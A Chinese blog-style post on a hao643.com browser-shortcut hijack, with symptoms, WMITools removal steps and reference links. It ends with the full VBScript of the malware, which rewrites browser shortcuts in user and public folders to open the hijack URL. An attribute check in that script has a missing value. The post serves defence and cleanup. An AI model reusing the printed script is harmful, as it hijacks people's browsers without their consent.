hao643.com劫持（修改快捷方式跳转至hao123.com）

>症状：
所有浏览器快捷方式，都被加上尾巴，例如IE的："C:\Program Files\Internet Explorer\iexplore.exe" http://hao643.com/?r=ggggg&m=c104
手工去掉尾巴后，每隔一定时间（网友说是30分钟）后，尾巴重新被加上。
PS：这病毒仅修改快捷方式，应该没有其它病毒特征。

>解决方案：
1.安装WMITools（点击下载）
2.管理员身份打开 C:\Program Files (x86)\WMI Tools\wbemeventviewer.exe
3.点击左上角按钮register for events
4.OK－－OK
5.第1个下拉菜单有3个选择项：Consumers、Filters、Timers
6.把这3个选择项下的所有实例全部删除（右键菜单,Delete instance）
7.去掉所有浏览器快捷方式的尾巴－－涉及浏览器：114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe
8.Done.

>参考：
http://www.pc18.com/soft/15730.html
http://jingyan.baidu.com/article/0964eca26f47b38285f536c6.html

>附 病毒脚本

 On Error Resume Next:Const link = "http://hao643.com/?r=ggggg&m=c104":Const link360 = "http://hao643.com/?r=ggggg&m=c104&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\ChenShao\Desktop,C:\Users\ChenShao\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\ChenShao\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\ChenShao\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\ChenShao\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And  Then:file.Attributes = file.Attributes - :End If:oShellLink.Save:End If:End If:Next:End If:Next:

 >PS：
大学期间，hao123是我非常非常喜欢的网站，帮人装完系统之后，都把它设置为主页；百度收购之后，好感度下降，但还用着；发现它恶意推广之后，此生再也没打开过hao123（被强制弹出的除外）。